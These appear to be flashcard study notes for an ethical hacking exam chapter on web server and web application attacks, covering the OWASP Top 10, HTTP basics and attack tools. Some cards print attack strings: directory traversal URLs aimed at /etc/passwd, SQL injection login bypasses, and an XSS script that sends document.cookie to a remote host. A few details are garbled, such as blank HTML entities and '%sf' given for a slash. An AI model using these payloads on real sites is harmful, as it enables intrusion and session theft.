Chapter 6 - Web Based Hacking Servers and Applications

Question 1

Web Organizations

Internet Engineering Task Force (IETF)

World Wide Web Consortium (W3C)

Open Web Application Security Project (OWASP)

Answer 1

IETF - publishes RFC’s. No policy or business, only engineering.

W3C - develop protocols and guidelines to ensure long term growth of the web. Tries to get vendors to implement core principles and components

OWASP - charitable organization focused on improving security of software. Publishes reports, documents, training efforts to assist in web security

Question 2

OWASP Top 10

Answer 2

broad consensus about what the most critical web application security flaws are

A1 - injection flaws
A2 - broken authentication and session management
A3 - Cross-Site Scripting (XSS)
A4 - insecure direct object references
A5 - security misconfiguration
A6 - sensitive data exposure
A7 - missing function level access control
A8 - cross-site request forgery
A9 - using components with known vulnerabilities
A10 - unvalidated redirects and forwards

Question 3

A1

Injection Flaws

Answer 3

SQL, OS, LDAP occur when untrusted data sent to an interpreter as part of a command or query

Hostile data can trick interpreter into executing commands or accessing data without authorization

Question 4

A2

Broken Authentication and Session Management

Answer 4

can allow attackers to compromise passwords, keys, session tokens or exploit other implementation flaws to assume other users’ identities

Question 5

A3

Cross-Site Scripting (XSS)

Answer 5

occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping.

Lets attackers execute scripts in target browser which can hijack user sessions, deface websites or redirect user to malicious website

Question 6

A4

Insecure Direct Object References

Answer 6

A direct object reference occurs when developer exposes a reference to an internal implementation object like a file, directory or database key.

Without access control check or other protection, attackers can manipulate these references to access unauthorized data

Question 7

A5

Security Misconfiguration

Answer 7

security configurations should be defined and deployed for applications, frameworks, servers and platforms.

defaults are often insecure, so secure settings should be defined and implemented

software should be updated

Question 8

A6

Sensitive Data Exposure

Answer 8

Many web applications don’t properly protect sensitive data and authentication credentials

sensitive data deserves extra protection like encryption at rest and transit, and special precautions when exchanged with the browser

Question 9

A7

Missing Function Level Access Control

Answer 9

Most web applications verify function level access rights before making that functionality visible in the UI. But applications need to perform the same access control checks on the server when each function is accessed

If requests aren’t verified attackers can forge requests to access functionality without proper authorization

Question 10

A8

Cross-Site Request Forgery (CSRF)

Answer 10

CSRF attack forces a logged-on victim’s browser to send a forged HTTP request including the victim’s session cookie and any other automatically included authentication info to a vulnerable web application

This allows attacker to force victim’s browser to generate requests the vulnerable applications thinks are legitimate requests from the victim

Question 11

A9

Using Components with Known Vulnerabilities

Answer 11

Many components are often run with full privileges. If one is exploited, an attack can facilitate serious loss or server takeover.

Applications using components with known vulnerabilities can undermine application defenses and enable a range of attacks and impacts

Question 12

A10

Unvalidated Requests and Forwards

Answer 12

Web applications often redirect and forward users to other pages and websites and use untrusted data to determine the destination pages.

Without proper validation, attackers can redirect victim to phishing or malware sites or use forwards to access unauthorized pages

Question 13

ECC’s 6 Stages of Web Server Attack Methodology

Answer 13

information gathering

footprinting

mirroring websites

vulnerability scanning

session hijacking

password cracking

Question 14

web server attack

information gathering and footprinting

Answer 14

whois and banner grabbing

net craft for high level info

HTTPRecon, IDServe for identifying web server architecture and OS

HTTPrint

Burp Suite can give insight to content

Black Wiow, HTTrack can copy website to your system for review

Question 15

web server attack

vulnerability scanning

Answer 15

Nessus is ok

Nikto is designed for web servers: file problems, script errors, server configuration errors. Can be configured within Nessus to automatically scan when a web server is discovered. Plugins and signatures available

Nikto is not a stealthy tool

Question 16

Web Server Architecture

Steps to request and receive a web page

Answer 16

client sends request to server to open TCP port on 80 or 443 (typically)

after agreeing to the handshake on the page request, the server waits for HTTP GET request from the client

HTTP GET request asks for specific HTML code representing a web page

Server looks through storage area, finds code that matches request and sends to client

Question 17

Issues to consider when a client requests a web page

Answer 17

does the server validate what client is requesting

does server respond only to verbiage in the request or can it get confused and respond with other actions

where are the actual files of HTML and other code stored. How are their permissions assigned.

etc etc

Question 18

Tier system in network architecture

Answer 18

N-tier architecture (aka multi-tier architecture) distributes processes across multiple servers

each tier consists of single role carried out by one or more computer systems (or a cluster)

Typically this is done in 3 Tiers:

presentation
logic
data

Question 19

Apache design and architecture

Answer 19

Apache is built modularly with a core and modules to perform variety of functions. Open source so many add-ons available

Question 20

Commonly misconfigured settings on Apache or IIS

Answer 20

error messaging (debug logs are useful)
default passwords
SSL certificates
scripts
remote admin functions
config files and services
properly restricting remote administration
eliminating unnecessary services
changing default passwords and accounts

Question 21

HTTP Protocol details

Hypertext Transfer Protocol

Answer 21

designed as a request-response Application Layer protocol where client requests hypertext from a server

client requests a resource using its Uniform Resource Indicator (URI) which is typically expressed for web requests as a Uniform Resource Locator (URL)

Server responds to HTTP requests by providing the resource requested

Question 22

HTML Details

Answer 22

HTML is a method to mark up hypertext so it will display accordingly in a browser

HTML files consist of tags that tell browser how to display data

<img></img> common ones

Question 23

HTML Entities

Answer 23

ways of telling the browser to display those characters it would otherwise look at as a tag or part of the programming itself.

Reserved Character in HTML - HTML Entity Version
space - 
" - "
' - '
& - &
< - <
> - >

Question 24

HTML Entities

Answer 24

ways of telling the browser to display those characters it would otherwise look at as a tag or part of the programming itself.

Reserved Character in HTML - HTML Entity Version
nonbreaking space - 
" - "
' - '
& - &
< - <
> - >

Question 25

HTTP Request Methods

Answer 25

GET - retrieve whatever info is identified by the Request URI. Problem is was originally designed to send data also by appending data to the URL

HEAD - identical to GET but server MUST NOT return a message-body in the response. Often used for testing hypertext links for validity, accessibility, modification, requesting headers and metadata

POST - used to request that origin server accept entity in the request as new subordinate of resource identified by Request URI. Better method of submitting data. Primary purpose is to provide data for server. Generally considered safer than GET because admin can set it to not store in browser history or server logs, doesn’t display returned data in the URL

PUT
TRACE
CONNECT

Question 26

HTTP Request Methods

Answer 26

GET - retrieve whatever info is identified by the Request URI. Problem is was originally designed to send data also by appending data to the URL

HEAD - identical to GET but server MUST NOT return a message-body in the response. Often used for testing hypertext links for validity, accessibility, modification, requesting headers and metadata

POST - used to request that origin server accept entity in the request as new subordinate of resource identified by Request URI. Better method of submitting data. Primary purpose is to provide data for server. Generally considered safer than GET because admin can set it to not store in browser history or server logs, doesn’t display returned data in the URL

PUT - requests that enclosed entity be stored under supplied Request URI. If Request-URI refers to existing resource, enclosed entity should be consider a modifying version.

DELETE - requests origin server delete resource identified by URI

TRACE - invokes remote application layer loopback of the request message. Final recipient of request should reflect the message received back to the client as the entity body of a 200 (OK) response

CONNECT - reserved for use with proxy that can dynamically switch to being a tunnel (ie SSL tunneling)

Question 27

HTTP Response Messages

First digit defines the class of response

Last two digits don’t have categorization role, but more clearly define the response intent

Answer 27

Five Values for first digit

1xx - Informational. Request received. continuing process
2xx - success
3xx - redirection. further action needed to complete request
4xx - client error. request contains bad syntax or can’t be fulfilled
5xx - server error. server failed to fulfill apparently valid request

Question 28

Exam Tip

DNS Amplification

Answer 28

DNS Amplification is an attack manipulating recursive DNS to DoS a target

attacker uses botnet to amplify DNS answers to the target until it can’t do anything else

Question 29

Directory Traversal attack

aka dot dot slash (../) attack, directory climbing, backtracking

Answer 29

common and successful on older servers

attacker tries to access restricted directories and execute commands outside intended web server directories.

sends HTTP requests asking server to drop back to the root directory and give access to other folders

ex

http: //www.example.com/../../../etc/passwd
http: //www.example.com/../../../Windows\system32\cmd.exe

problem is that it’s noisy. Signature based IDS have many rules looking for this. One workaround is to use unicode in the string to represent dots and slashes.

%2e can represent a dot
%sf can represent a slash

%2e%2e%sf

Question 30

Attack by manipulating the hidden field on the source code of the page

Answer 30

HTML code attribute called “hidden” and if it’s there you can view it in the page source code.

Save the page to your computer, alter data and open it in a browser.

Or look for information that is useful

Question 31

Connection String Parameter Pollution (CSPP)

Answer 31

injection attack that takes advantage of web applications that talk to databases by using semicolons to separate each parameter

Can be used to steal user identities and hijack web credentials

Question 32

HTTP Attack Tools

Brutus
THC-Hydra
Metasploit

Answer 32

Brutus - good for brute-forcing web passwords of HTTP

THC-Hydra - fast network logon cracker

Question 33

Metasploit Framework - 5 Actions

Answer 33

select exploit to use

configure options

select target

select payload

launch exploit

Question 34

Attacking Web Applications

ECC definition of web application

Answer 34

Web application fills a gap between the website front end and the actual database performing the work

They’re becoming a good attack vector because there are many of them, they aren’t standardized and are often created in-house, so frequently don’t have much security oversight when they’re built

Question 35

Tips for attacking web applications

Answer 35

identify entry points:
examine cookies, headers, POST data, encoding and encryption measures. Obviously look at the URL for input parameters and similar

Identify function and technology on the server side to try and learn server makeup, form, function

ex. an aspx file shows the platform. inDate stopDate name can be columns from a database. Error messages and session tokens can provide info

use mirroring to create a local copy for taking your time

Question 36

Injection attacks that aren’t SQL

file injection
command injection
shell injection
LDAP injection
SOAP (Simple Object Access Protocol)

Answer 36

file
attacker injects a pointer in the web form input to an exploit hosted on a remote site

command
attacker injects commands into form fields instead of the expected test entry

shell
attacker tries to gain shell access using Java or other functions

LDAP
exploits applications that build LDAP statements based on user input. Exploits non validated web input that passes LDAP queries.

SOAP
inject malicious query strings (like SQL injection) that can allow you to bypass authentication and access databases behind the scenes. SOAP is compatible with HTTP, SMTP and messages are typically one-way

Question 37

Buffer Overflow attacks

Answer 37

attempt to write more data into an application’s pre-built buffer in order to overwrite adjacent memory, execute code or crash an application

Question 38

Canary words

Answer 38

like the canary in the coal mine

known values placed between the buffer and control data. If a buffer overflow occurs, the canary word is altered first allowing for an orderly stop

ex. Stackguard

Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) are common ways to mitigate buffer overflows.

Question 39

Cross Site Scripting (XSS) attacks

Answer 39

attacker takes advantage of scripting language on website (ie when a web form asks for user input, a script dynamically changes appearance or behavior of the site based on the input)

ex.
instead of typing in what you’re supposed to, you type in a script and the server processes it

Question 40

Exam Tip for XSS

know what XSS is, what you can do with it

Recognize that a URL like the following indicates XSS attack attempt

Answer 40

http://IPADDRESS/”;!- -“=&{()}

Question 41

Classic XSS attack

Answer 41

get access to ‘document.cookie’ and sending it to a remote host. Ex. if the app is vulnerable to XSS, this javascript will be run and you can get cookies from users accessing the page

<script>
window.open("
http://somewhere.com/getcookie.acookie="
         \+ document.cookie)
</script>

Question 42

Things you can do with XSS attacks

include Stored XX (aka Persistent or Type-I XSS)

Answer 42

DoS
send XSS attack over email
store injected scripted on server (database message forum, log or comment field)
upload malicious code to users connected to server
get PHP session ID’s

Question 43

Cross-Site Request Forgery (CSRF)

Answer 43

Forces end user to execute unwanted actions on a web application they’re currently authenticated to

Inherits identity and privileges of the victim

For many sites, browser requests automatically include credentials like user session cookie, IP address, Windows domain credentials, etc

If user is currently authenticated to the site, the site can’t distinguish between forged request and legitimate one

Mitigate CSRF attacks by having web server send random challenge tokens. If every user request includes the token, it’s easy to spot illegitimate requests

Question 44

Cookies

Answer 44

Sent in the header of an HTTP response from a web server.

Cookie editor add on for Firefox is useful

Can contain passwords (use Karen’s Cookie Viewer)

Use a Unicode or Base64 decoder to analyze long text strings beside the UserID section

Can be manipulated to use as spyware, change pricing, authenticate to a server, i.e. changing entry from ADMIN=NO to ADMIN=YES

Question 45

Cookies

Answer 45

Sent in the header of an HTTP response from a web server.

Cookie editor add on for Firefox is useful

Can contain passwords (use Karen’s Cookie Viewer)

Use a Unicode or Base64 decoder to analyze long text strings beside the UserID section

Can be manipulated to use as spyware, change pricing, authenticate to a server, i.e. changing entry from ADMIN=NO to ADMIN=YES

Question 46

SQL encompasses which three standard areas of data handling?

Which one are most SQL injections in?

Answer 46

Definition (DDL)

Manipulation (DML)

Control (DCL)

Most SQL injections are in DML

Question 47

SQL Injection

Answer 47

when attacker injects SQL queries directly into the input form. When successful the command executes directly on the SQL database

Can inject SQL to a form, or the URL itself
ex. change URL to: www.example.com/?login=’OR 1=1–

Question 48

How do you tell if a target is vulnerable to SQL injection?

Answer 48

in a web login page, instead of entering what they ask for put in a single quote: ‘

See what error message you get. if that doesn’t work, put in: anything’or 1=1

and see what you get. If you get a Microsoft OLE error message, it’s most likely vulnerable

Question 49

How do you tell if a target is vulnerable to SQL injection?

Answer 49

in a web login page, instead of entering what they ask for put in a single quote: ‘

See what error message you get. if that doesn’t work, put in: anything’or 1=1

and see what you get. If you get a Microsoft OLE error message, it’s most likely vulnerable

Also use the “magic quotes” for Apache and use fuzzing tools like Burp Suite

Question 50

Examples of how to use SQL injection attacks

Answer 50

send a SQL command instead of the “forgot your password” response to create (INSERT) a new record int the user and password table

Try logging in using SQL statements like (admin ‘–) or (admin ‘ /*) or (‘ or 1=1–)

Question 51

Some names of SQL injection samples

Union Query
Tautology
Blind SQL Injection
Error-based SQL injection

Answer 51

Union Query
Lets you join together SELECT queries, for instance combining a harmless query with one that’s malicious.

Tautology
Describes behaviors of DB system when deciding if a statement is true. Because User ID’s and passwords are often compared and the ‘true’ measure allows access, if you trick DB by providing something that’s already true, you can sneak in

Blind SQL Injection
When attacker knows database susceptible to injection but error messages and screen returns don’t come back to him. Much guesswork, trial and error so takes a lot of time

Error-based SQL injection
Enumeration technique more than attack. Goal is to enter poorly constructed statements to get DB to respond with table names and other information in its error messages

Question 52

HTTP Response Splitting

Answer 52

Add header response data to an input field so server splits response in a couple directions

if it works, attacker controls content of second header which can be used for multiple things, like redirecting user to a controlled site.

OWASP calls this a means to an end, not an end in itself because it’s designed to allow other attacks